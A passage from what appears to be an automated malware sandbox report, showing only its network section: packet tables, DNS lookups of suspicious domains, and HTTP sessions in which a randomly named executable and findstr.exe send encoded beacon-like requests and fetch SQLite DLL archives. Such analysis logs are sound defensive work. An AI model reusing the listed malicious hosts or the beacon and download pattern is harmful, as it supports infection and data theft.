                                                                                                  Oct 21, 2024 13:16:07.188860893 CEST4917780192.168.2.22162.0.238.246
                                                                                                  Oct 21, 2024 13:16:07.194257975 CEST8049177162.0.238.246192.168.2.22
                                                                                                  Oct 21, 2024 13:16:12.221074104 CEST4917880192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:12.226563931 CEST804917815.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:12.226651907 CEST4917880192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:12.237410069 CEST4917880192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:12.243041992 CEST804917815.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:12.243072987 CEST804917815.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:12.243108034 CEST4917880192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:12.248797894 CEST804917815.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:12.853171110 CEST804917815.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:12.853219986 CEST4917880192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:13.747498989 CEST4917880192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:13.752940893 CEST804917815.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:14.766422987 CEST4917980192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:14.772084951 CEST804917915.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:14.772351027 CEST4917980192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:14.785214901 CEST4917980192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:14.790687084 CEST804917915.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:15.419595003 CEST804917915.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:15.421025038 CEST4917980192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:16.288583994 CEST4917980192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:16.294024944 CEST804917915.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:17.305341005 CEST4918080192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:17.311002970 CEST804918015.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:17.311264992 CEST4918080192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:17.337447882 CEST4918080192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:17.342955112 CEST804918015.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:17.343046904 CEST4918080192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:17.343128920 CEST804918015.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:17.348515987 CEST804918015.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:17.348615885 CEST804918015.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:18.846941948 CEST4918080192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:18.853418112 CEST804918015.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:18.853621006 CEST4918080192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:19.863584995 CEST4918180192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:19.873435974 CEST804918115.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:19.873512983 CEST4918180192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:19.880147934 CEST4918180192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:19.885634899 CEST804918115.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:19.945308924 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:16:19.951579094 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:16:19.951710939 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:16:20.496273041 CEST804918115.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:20.496898890 CEST804918115.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:20.496951103 CEST4918180192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:20.499017000 CEST4918180192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:20.504251003 CEST804918115.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:25.508841991 CEST4918280192.168.2.22206.119.82.148
                                                                                                  Oct 21, 2024 13:16:25.514314890 CEST8049182206.119.82.148192.168.2.22
                                                                                                  Oct 21, 2024 13:16:25.514409065 CEST4918280192.168.2.22206.119.82.148
                                                                                                  Oct 21, 2024 13:16:25.525779009 CEST4918280192.168.2.22206.119.82.148
                                                                                                  Oct 21, 2024 13:16:25.531228065 CEST8049182206.119.82.148192.168.2.22
                                                                                                  Oct 21, 2024 13:16:25.531397104 CEST4918280192.168.2.22206.119.82.148
                                                                                                  Oct 21, 2024 13:16:25.531557083 CEST8049182206.119.82.148192.168.2.22
                                                                                                  Oct 21, 2024 13:16:25.536875963 CEST8049182206.119.82.148192.168.2.22
                                                                                                  Oct 21, 2024 13:16:26.471731901 CEST8049182206.119.82.148192.168.2.22
                                                                                                  Oct 21, 2024 13:16:26.658365011 CEST8049182206.119.82.148192.168.2.22
                                                                                                  Oct 21, 2024 13:16:26.658413887 CEST4918280192.168.2.22206.119.82.148
                                                                                                  Oct 21, 2024 13:16:27.039271116 CEST4918280192.168.2.22206.119.82.148
                                                                                                  Oct 21, 2024 13:16:28.056098938 CEST4918380192.168.2.22206.119.82.148
                                                                                                  Oct 21, 2024 13:16:28.129992962 CEST8049183206.119.82.148192.168.2.22
                                                                                                  Oct 21, 2024 13:16:28.130068064 CEST4918380192.168.2.22206.119.82.148
                                                                                                  Oct 21, 2024 13:16:28.145299911 CEST4918380192.168.2.22206.119.82.148
                                                                                                  Oct 21, 2024 13:16:28.150758982 CEST8049183206.119.82.148192.168.2.22
                                                                                                  Oct 21, 2024 13:16:29.086075068 CEST8049183206.119.82.148192.168.2.22
                                                                                                  Oct 21, 2024 13:16:29.267734051 CEST8049183206.119.82.148192.168.2.22
                                                                                                  Oct 21, 2024 13:16:29.267848969 CEST4918380192.168.2.22206.119.82.148
                                                                                                  Oct 21, 2024 13:16:29.661098957 CEST4918380192.168.2.22206.119.82.148
                                                                                                  Oct 21, 2024 13:16:30.676791906 CEST4918480192.168.2.22206.119.82.148
                                                                                                  Oct 21, 2024 13:16:30.682311058 CEST8049184206.119.82.148192.168.2.22
                                                                                                  Oct 21, 2024 13:16:30.682408094 CEST4918480192.168.2.22206.119.82.148
                                                                                                  Oct 21, 2024 13:16:30.697880030 CEST4918480192.168.2.22206.119.82.148
                                                                                                  Oct 21, 2024 13:16:30.703453064 CEST8049184206.119.82.148192.168.2.22
                                                                                                  Oct 21, 2024 13:16:30.703464985 CEST8049184206.119.82.148192.168.2.22
                                                                                                  Oct 21, 2024 13:16:30.703522921 CEST4918480192.168.2.22206.119.82.148
                                                                                                  Oct 21, 2024 13:16:30.709064007 CEST8049184206.119.82.148192.168.2.22
                                                                                                  Oct 21, 2024 13:16:30.709074974 CEST8049184206.119.82.148192.168.2.22
                                                                                                  Oct 21, 2024 13:16:31.623502970 CEST8049184206.119.82.148192.168.2.22
                                                                                                  Oct 21, 2024 13:16:31.798542976 CEST8049184206.119.82.148192.168.2.22
                                                                                                  Oct 21, 2024 13:16:31.798958063 CEST4918480192.168.2.22206.119.82.148
                                                                                                  Oct 21, 2024 13:16:32.200500011 CEST4918480192.168.2.22206.119.82.148
                                                                                                  Oct 21, 2024 13:16:33.217433929 CEST4918580192.168.2.22206.119.82.148
                                                                                                  Oct 21, 2024 13:16:33.407581091 CEST8049185206.119.82.148192.168.2.22
                                                                                                  Oct 21, 2024 13:16:33.407649040 CEST4918580192.168.2.22206.119.82.148
                                                                                                  Oct 21, 2024 13:16:33.414256096 CEST4918580192.168.2.22206.119.82.148
                                                                                                  Oct 21, 2024 13:16:33.420574903 CEST8049185206.119.82.148192.168.2.22
                                                                                                  Oct 21, 2024 13:16:34.383672953 CEST8049185206.119.82.148192.168.2.22
                                                                                                  Oct 21, 2024 13:16:34.565193892 CEST8049185206.119.82.148192.168.2.22
                                                                                                  Oct 21, 2024 13:16:34.567265987 CEST4918580192.168.2.22206.119.82.148
                                                                                                  Oct 21, 2024 13:16:34.567265987 CEST4918580192.168.2.22206.119.82.148
                                                                                                  Oct 21, 2024 13:16:34.572829008 CEST8049185206.119.82.148192.168.2.22
                                                                                                  Oct 21, 2024 13:16:39.613337040 CEST4918680192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:39.618743896 CEST804918615.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:39.618798971 CEST4918680192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:39.629641056 CEST4918680192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:39.635067940 CEST804918615.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:39.635081053 CEST804918615.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:39.635128975 CEST4918680192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:39.640463114 CEST804918615.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:40.266624928 CEST804918615.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:40.266902924 CEST4918680192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:41.139410019 CEST4918680192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:41.144835949 CEST804918615.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:42.155632019 CEST4918780192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:42.161248922 CEST804918715.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:42.161412001 CEST4918780192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:42.174022913 CEST4918780192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:42.179516077 CEST804918715.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:42.788275003 CEST804918715.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:42.788384914 CEST4918780192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:43.682038069 CEST4918780192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:43.789278984 CEST804918715.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:44.698805094 CEST4918880192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:44.704284906 CEST804918815.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:44.704432964 CEST4918880192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:44.715029955 CEST4918880192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:44.720451117 CEST804918815.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:44.720535040 CEST804918815.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:44.720576048 CEST4918880192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:44.725985050 CEST804918815.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:44.726033926 CEST804918815.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:46.224909067 CEST4918880192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:46.230690002 CEST804918815.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:46.230757952 CEST4918880192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:47.241723061 CEST4918980192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:47.247370005 CEST804918915.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:47.247431993 CEST4918980192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:47.254251957 CEST4918980192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:47.259643078 CEST804918915.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:48.791564941 CEST804918915.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:48.792478085 CEST804918915.197.148.33192.168.2.22
                                                                                                  Oct 21, 2024 13:16:48.792562008 CEST4918980192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:48.794301987 CEST4918980192.168.2.2215.197.148.33
                                                                                                  Oct 21, 2024 13:16:48.799658060 CEST804918915.197.148.33192.168.2.22

                                                                                                  UDP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Oct 21, 2024 13:15:19.816417933 CEST5278153192.168.2.228.8.8.8
                                                                                                  Oct 21, 2024 13:15:19.827888966 CEST53527818.8.8.8192.168.2.22
                                                                                                  Oct 21, 2024 13:15:25.310534000 CEST6392653192.168.2.228.8.8.8
                                                                                                  Oct 21, 2024 13:15:25.321059942 CEST53639268.8.8.8192.168.2.22
                                                                                                  Oct 21, 2024 13:15:35.506843090 CEST6551053192.168.2.228.8.8.8
                                                                                                  Oct 21, 2024 13:15:35.514727116 CEST53655108.8.8.8192.168.2.22
                                                                                                  Oct 21, 2024 13:15:49.422194958 CEST6267253192.168.2.228.8.8.8
                                                                                                  Oct 21, 2024 13:15:49.432833910 CEST53626728.8.8.8192.168.2.22
                                                                                                  Oct 21, 2024 13:15:50.448462963 CEST5647553192.168.2.228.8.8.8
                                                                                                  Oct 21, 2024 13:15:50.486641884 CEST53564758.8.8.8192.168.2.22
                                                                                                  Oct 21, 2024 13:15:51.502863884 CEST4938453192.168.2.228.8.8.8
                                                                                                  Oct 21, 2024 13:15:51.512804985 CEST53493848.8.8.8192.168.2.22
                                                                                                  Oct 21, 2024 13:15:52.516401052 CEST5484253192.168.2.228.8.8.8
                                                                                                  Oct 21, 2024 13:15:52.526149988 CEST53548428.8.8.8192.168.2.22
                                                                                                  Oct 21, 2024 13:15:57.526055098 CEST5810553192.168.2.228.8.8.8
                                                                                                  Oct 21, 2024 13:15:57.558804989 CEST53581058.8.8.8192.168.2.22
                                                                                                  Oct 21, 2024 13:16:12.210398912 CEST6492853192.168.2.228.8.8.8
                                                                                                  Oct 21, 2024 13:16:12.218950987 CEST53649288.8.8.8192.168.2.22
                                                                                                  Oct 21, 2024 13:16:25.496990919 CEST5739053192.168.2.228.8.8.8
                                                                                                  Oct 21, 2024 13:16:25.506719112 CEST53573908.8.8.8192.168.2.22
                                                                                                  Oct 21, 2024 13:16:39.588747978 CEST5809553192.168.2.228.8.8.8
                                                                                                  Oct 21, 2024 13:16:39.611196041 CEST53580958.8.8.8192.168.2.22
                                                                                                  Oct 21, 2024 13:16:53.794759989 CEST5426153192.168.2.228.8.8.8
                                                                                                  Oct 21, 2024 13:16:53.808384895 CEST53542618.8.8.8192.168.2.22

                                                                                                  DNS Queries

                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                  Oct 21, 2024 13:15:19.816417933 CEST192.168.2.228.8.8.80x6298Standard query (0)www.deikamalaharris.infoA (IP address)IN (0x0001)false
                                                                                                  Oct 21, 2024 13:15:25.310534000 CEST192.168.2.228.8.8.80x2db5Standard query (0)www.sqlite.orgA (IP address)IN (0x0001)false
                                                                                                  Oct 21, 2024 13:15:35.506843090 CEST192.168.2.228.8.8.80xfd7aStandard query (0)www.rockbull.proA (IP address)IN (0x0001)false
                                                                                                  Oct 21, 2024 13:15:49.422194958 CEST192.168.2.228.8.8.80x2303Standard query (0)www.timetime.storeA (IP address)IN (0x0001)false
                                                                                                  Oct 21, 2024 13:15:50.448462963 CEST192.168.2.228.8.8.80x7f57Standard query (0)www.timetime.storeA (IP address)IN (0x0001)false
                                                                                                  Oct 21, 2024 13:15:51.502863884 CEST192.168.2.228.8.8.80xef21Standard query (0)www.timetime.storeA (IP address)IN (0x0001)false
                                                                                                  Oct 21, 2024 13:15:52.516401052 CEST192.168.2.228.8.8.80xdc57Standard query (0)www.timetime.storeA (IP address)IN (0x0001)false
                                                                                                  Oct 21, 2024 13:15:57.526055098 CEST192.168.2.228.8.8.80x59ffStandard query (0)www.guldeu.xyzA (IP address)IN (0x0001)false
                                                                                                  Oct 21, 2024 13:16:12.210398912 CEST192.168.2.228.8.8.80xf1c7Standard query (0)www.asiapartnars.onlineA (IP address)IN (0x0001)false
                                                                                                  Oct 21, 2024 13:16:25.496990919 CEST192.168.2.228.8.8.80x30a2Standard query (0)www.wdgb23.topA (IP address)IN (0x0001)false
                                                                                                  Oct 21, 2024 13:16:39.588747978 CEST192.168.2.228.8.8.80x3458Standard query (0)www.childlesscatlady.todayA (IP address)IN (0x0001)false
                                                                                                  Oct 21, 2024 13:16:53.794759989 CEST192.168.2.228.8.8.80xb2dbStandard query (0)www.martaschrimpf.infoA (IP address)IN (0x0001)false

                                                                                                  DNS Answers

                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                  Oct 21, 2024 13:14:56.005990982 CEST8.8.8.8192.168.2.220xdd47No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                  Oct 21, 2024 13:14:56.005990982 CEST8.8.8.8192.168.2.220xdd47No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                  Oct 21, 2024 13:15:19.827888966 CEST8.8.8.8192.168.2.220x6298No error (0)www.deikamalaharris.infodeikamalaharris.infoCNAME (Canonical name)IN (0x0001)false
                                                                                                  Oct 21, 2024 13:15:19.827888966 CEST8.8.8.8192.168.2.220x6298No error (0)deikamalaharris.info3.33.130.190A (IP address)IN (0x0001)false
                                                                                                  Oct 21, 2024 13:15:19.827888966 CEST8.8.8.8192.168.2.220x6298No error (0)deikamalaharris.info15.197.148.33A (IP address)IN (0x0001)false
                                                                                                  Oct 21, 2024 13:15:25.321059942 CEST8.8.8.8192.168.2.220x2db5No error (0)www.sqlite.org45.33.6.223A (IP address)IN (0x0001)false
                                                                                                  Oct 21, 2024 13:15:35.514727116 CEST8.8.8.8192.168.2.220xfd7aNo error (0)www.rockbull.prorockbull.proCNAME (Canonical name)IN (0x0001)false
                                                                                                  Oct 21, 2024 13:15:35.514727116 CEST8.8.8.8192.168.2.220xfd7aNo error (0)rockbull.pro185.174.173.22A (IP address)IN (0x0001)false
                                                                                                  Oct 21, 2024 13:15:49.432833910 CEST8.8.8.8192.168.2.220x2303Name error (3)www.timetime.storenonenoneA (IP address)IN (0x0001)false
                                                                                                  Oct 21, 2024 13:15:50.486641884 CEST8.8.8.8192.168.2.220x7f57Name error (3)www.timetime.storenonenoneA (IP address)IN (0x0001)false
                                                                                                  Oct 21, 2024 13:15:51.512804985 CEST8.8.8.8192.168.2.220xef21Name error (3)www.timetime.storenonenoneA (IP address)IN (0x0001)false
                                                                                                  Oct 21, 2024 13:15:52.526149988 CEST8.8.8.8192.168.2.220xdc57Name error (3)www.timetime.storenonenoneA (IP address)IN (0x0001)false
                                                                                                  Oct 21, 2024 13:15:57.558804989 CEST8.8.8.8192.168.2.220x59ffNo error (0)www.guldeu.xyz162.0.238.246A (IP address)IN (0x0001)false
                                                                                                  Oct 21, 2024 13:16:12.218950987 CEST8.8.8.8192.168.2.220xf1c7No error (0)www.asiapartnars.onlineasiapartnars.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                  Oct 21, 2024 13:16:12.218950987 CEST8.8.8.8192.168.2.220xf1c7No error (0)asiapartnars.online15.197.148.33A (IP address)IN (0x0001)false
                                                                                                  Oct 21, 2024 13:16:12.218950987 CEST8.8.8.8192.168.2.220xf1c7No error (0)asiapartnars.online3.33.130.190A (IP address)IN (0x0001)false
                                                                                                  Oct 21, 2024 13:16:25.506719112 CEST8.8.8.8192.168.2.220x30a2No error (0)www.wdgb23.topwdgb23.topCNAME (Canonical name)IN (0x0001)false
                                                                                                  Oct 21, 2024 13:16:25.506719112 CEST8.8.8.8192.168.2.220x30a2No error (0)wdgb23.top206.119.82.148A (IP address)IN (0x0001)false
                                                                                                  Oct 21, 2024 13:16:39.611196041 CEST8.8.8.8192.168.2.220x3458No error (0)www.childlesscatlady.todaychildlesscatlady.todayCNAME (Canonical name)IN (0x0001)false
                                                                                                  Oct 21, 2024 13:16:39.611196041 CEST8.8.8.8192.168.2.220x3458No error (0)childlesscatlady.today15.197.148.33A (IP address)IN (0x0001)false
                                                                                                  Oct 21, 2024 13:16:39.611196041 CEST8.8.8.8192.168.2.220x3458No error (0)childlesscatlady.today3.33.130.190A (IP address)IN (0x0001)false
                                                                                                  Oct 21, 2024 13:16:53.808384895 CEST8.8.8.8192.168.2.220xb2dbNo error (0)www.martaschrimpf.info208.91.197.27A (IP address)IN (0x0001)false

                                                                                                  HTTP Request Dependency Graph

                                                                                                  • www.deikamalaharris.info
                                                                                                  • www.sqlite.org
                                                                                                  • www.rockbull.pro
                                                                                                  • www.guldeu.xyz
                                                                                                  • www.asiapartnars.online
                                                                                                  • www.wdgb23.top
                                                                                                  • www.childlesscatlady.today

                                                                                                  HTTP Packets

                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  0192.168.2.22491673.33.130.190801564C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 21, 2024 13:15:19.845560074 CEST479OUTGET /7qh8/?o0I8bJWh=30gz3aeCGXts4Q76IE+H941JnGeso7u8ST9k2gxA0wQlWv8qAc7eS7l6bdvqrf9uLD1EZ4RKxD3BFAyB/gyNnMcHzfUP1SI6JZ3kLHzdYP32mYCFOTVusz8SPvQZ&IzCDX=JREpwHC8S HTTP/1.1
                                                                                                  Host: www.deikamalaharris.info
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Connection: close
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
                                                                                                  Oct 21, 2024 13:15:20.478369951 CEST404INHTTP/1.1 200 OK
                                                                                                  Server: openresty
                                                                                                  Date: Mon, 21 Oct 2024 11:15:20 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 264
                                                                                                  Connection: close
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6f 30 49 38 62 4a 57 68 3d 33 30 67 7a 33 61 65 43 47 58 74 73 34 51 37 36 49 45 2b 48 39 34 31 4a 6e 47 65 73 6f 37 75 38 53 54 39 6b 32 67 78 41 30 77 51 6c 57 76 38 71 41 63 37 65 53 37 6c 36 62 64 76 71 72 66 39 75 4c 44 31 45 5a 34 52 4b 78 44 33 42 46 41 79 42 2f 67 79 4e 6e 4d 63 48 7a 66 55 50 31 53 49 36 4a 5a 33 6b 4c 48 7a 64 59 50 33 32 6d 59 43 46 4f 54 56 75 73 7a 38 53 50 76 51 5a 26 49 7a 43 44 58 3d 4a 52 45 70 77 48 43 38 53 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?o0I8bJWh=30gz3aeCGXts4Q76IE+H941JnGeso7u8ST9k2gxA0wQlWv8qAc7eS7l6bdvqrf9uLD1EZ4RKxD3BFAyB/gyNnMcHzfUP1SI6JZ3kLHzdYP32mYCFOTVusz8SPvQZ&IzCDX=JREpwHC8S"}</script></head></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  1192.168.2.224916845.33.6.22380728C:\Windows\SysWOW64\findstr.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 21, 2024 13:15:25.338615894 CEST242OUTGET /2021/sqlite-dll-win32-x86-3340000.zip HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
                                                                                                  Host: www.sqlite.org
                                                                                                  Connection: Keep-Alive
                                                                                                  Cache-Control: no-cache
                                                                                                  Oct 21, 2024 13:15:25.933815002 CEST312INHTTP/1.1 404 Not Found
                                                                                                  Connection: close
                                                                                                  Date: Mon, 21 Oct 2024 11:15:25 GMT
                                                                                                  Content-type: text/html; charset=utf-8
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 20 6c 69 6e 65 6e 6f 3d 22 33 38 30 22 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 44 6f 63 75 6d 65 6e 74 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 2f 32 30 32 31 2f 73 71 6c 69 74 65 2d 64 6c 6c 2d 77 69 6e 33 32 2d 78 38 36 2d 33 33 34 30 30 30 30 2e 7a 69 70 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                  Data Ascii: <html><head><title lineno="380">Not Found</title></head><body><h1>Document Not Found</h1>The document /2021/sqlite-dll-win32-x86-3340000.zip is not available on this server</body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  2192.168.2.224916945.33.6.22380728C:\Windows\SysWOW64\findstr.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 21, 2024 13:15:27.195919991 CEST242OUTGET /2017/sqlite-dll-win32-x86-3180000.zip HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
                                                                                                  Host: www.sqlite.org
                                                                                                  Connection: Keep-Alive
                                                                                                  Cache-Control: no-cache
                                                                                                  Oct 21, 2024 13:15:27.800167084 CEST249INHTTP/1.1 200 OK
                                                                                                  Connection: keep-alive
                                                                                                  Date: Mon, 21 Oct 2024 11:15:27 GMT
                                                                                                  Last-Modified: Thu, 11 May 2017 18:51:23 GMT
                                                                                                  Cache-Control: max-age=120
                                                                                                  ETag: "m5914b2abs6c4dc"
                                                                                                  Content-type: application/zip; charset=utf-8
                                                                                                  Content-length: 443612
                                                                                                  Oct 21, 2024 13:15:27.800215960 CEST1236INData Raw: 50 4b 03 04 14 00 00 00 08 00 9b ab 7e 4a 67 e8 5a d2 c3 04 00 00 81 13 00 00 0b 00 1c 00 73 71 6c 69 74 65 33 2e 64 65 66 55 54 09 00 03 25 16 dd 58 25 16 dd 58 75 78 0b 00 01 04 e8 03 00 00 04 64 00 00 00 85 98 cd 92 e4 26 0c 80 ef fb 36 bb 9b
                                                                                                  Data Ascii: PK~JgZsqlite3.defUT%X%Xuxd&69$\nj==OF4O_%*IlMD>&YSt~6(gx="=|`[]Yy$oq4kLu+5'@Srs|}YoU
                                                                                                  Oct 21, 2024 13:15:27.800272942 CEST1236INData Raw: ff 42 c5 66 2f da 5c dd 16 6c 72 65 a4 77 6c d5 b1 52 76 b0 84 59 8d 97 db 8b b5 ca 1a a8 ca 6b fe 42 35 9a f1 d0 d6 e9 3b 6d f9 1d 04 5f 0f 73 da be fc 07 50 4b 03 04 14 00 00 00 08 00 9b ab 7e 4a f7 0f c6 ab d7 be 06 00 2d f1 0c 00 0b 00 1c 00
                                                                                                  Data Ascii: Bf/\lrewlRvYkB5;m_sPK~J-sqlite3.dllUT%X%XuxdxT89I&`FjFh'&D Vs-9$@=fgV[z~A>h&A!#@lks&}<9g
                                                                                                  Oct 21, 2024 13:15:27.800308943 CEST1236INData Raw: 8c 3c 66 91 6e c3 1c 64 63 2a 8f 5f 1f 8e 7e 9d 9a f8 f8 57 91 08 24 c2 04 9b 5d ff 03 83 04 b5 40 17 23 f2 c1 64 a2 c2 28 14 37 29 ef dc 84 e0 d5 4d 50 9f e2 8d 4c 29 0b d3 5d f6 03 f5 86 28 00 f1 c0 54 b8 fd 84 55 06 33 f5 57 e9 06 79 8c 93 5e
                                                                                                  Data Ascii: <fndc*_~W$]@#d(7)MPL)](TU3Wy^}jl<1f5|S/&#=zzIHf_WDOr(&X,aCtyj?1^mCeVkN')6n\0s`s13!VudFv-in!?
